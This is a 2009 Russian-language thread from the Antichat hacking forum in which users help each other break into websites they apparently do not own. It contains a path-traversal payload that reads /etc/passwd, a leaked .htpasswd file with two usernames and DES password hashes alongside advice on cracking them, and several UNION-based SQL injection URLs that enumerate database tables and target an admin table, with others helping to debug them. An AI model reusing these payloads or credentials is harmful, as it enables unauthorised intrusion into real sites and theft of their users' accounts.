ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.06.2009, 00:00
|
|
Banned
Регистрация: 18.09.2008
Сообщений: 23
Провел на форуме:
94916
Репутация:
5
|
|
нет, как поиметь этот сайт...
У меня рутовый пасс был от сайта на том же двигле. в принципе некоторые скрипты остались.
|
|
|
20.06.2009, 00:02
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
.php?set_language=../../../../../../../../../../../../etc/passwd%00
дальше объяснять?
|
|
|
|
20.06.2009, 00:50
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
мне тут в репу написали про авторизацию
ну да, так насколько я пноимаю это скрипт админки, соответсвенно для эксплуатации уязвимости нужно быть залогиненым под админом
|
|
|
|
20.06.2009, 01:08
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме:
190310
Репутация:
7
|
|
/home/www/www.****.com/mothers/.htaccess
AuthUserFile /home/www/www.****.com/admin/.htpasswd
AuthName "Embracing Motherhood Mothers Section"
AuthType Basic
require valid-user
/home/www/www.****.com/admin/.htpasswd
nicyr:NSqcB/LOr6Ryw
meahans:X5qeSZwCEAM8M
Чем расштфровать? |
|
|
|
20.06.2009, 03:05
|
|
Участник форума
Регистрация: 20.08.2006
Сообщений: 199
Провел на форуме:
1074298
Репутация:
131
|
|
farpost, DES, можешь помучать Passwords Pro
|
|
|
|
20.06.2009, 20:21
|
|
Познающий
Регистрация: 27.03.2009
Сообщений: 40
Провел на форуме:
1191962
Репутация:
39
|
|
чет непойму
узнаю таблицы все норм...
http://site.com/body.php?id=-1+union+all+select+1,2,3,table_name,5,6,7,8+from+i nformation_schema.tables+limit+1,1--
допустим таблица admin
узнаю колонки тож все норм...
http://site.com/body.php?id=-1+union+all+select+1,2,3,column_name,5,6,7,8+from+ information_schema.columns+where+table_name=0x6164 6d696e--
а вот дальше появляется ошибка даж на этом моменте:
http://site.com/body.php?id=-1+union+all+select+1,2,3,4,5,6,7,8+from+admin+limi t+1,1--
Warning: Supplied argument is not a valid MySQL result resource in /home/www/class.php on line 147........
в чем проблема ??? |
|
|
|
20.06.2009, 20:35
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
попробуй UNION+SELECT+
а лучше линк в студию
|
|
|
|
20.06.2009, 20:42
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Adm1n4eG,
1. Посмотри в какой бд таблица.
2. Сколько в ней записей.
|
|
|
|
20.06.2009, 20:46
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Может быть что там идет например 2 гверя а при - limit+1,1 нету там столько вот и во второй запрос идет пустое значение, крч линк в студию а то так можно долго гадать.
|
|
|
|
20.06.2009, 20:51
|
|
Познающий
Регистрация: 27.03.2009
Сообщений: 40
Провел на форуме:
1191962
Репутация:
39
|
|
union+select тож пробовал не получается(
и причем подставляю любую таблицу всеравно ошибка появляется...
пробовал пробелы + /**/ ставить...
пробовал хешировать название таблиц по разному тож не выходит (((
насчет лимита нет он тут не причем по идее ошибки не должно быть уже при
http://site.com/body.php?id=-1+union+all+select+1,2,3,4,5,6,7,8+from+admin--
DATABASE():db_handset
VERSION():5.0.27-standard-log
78 таблиц в базе
извенить линк дать не могу...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
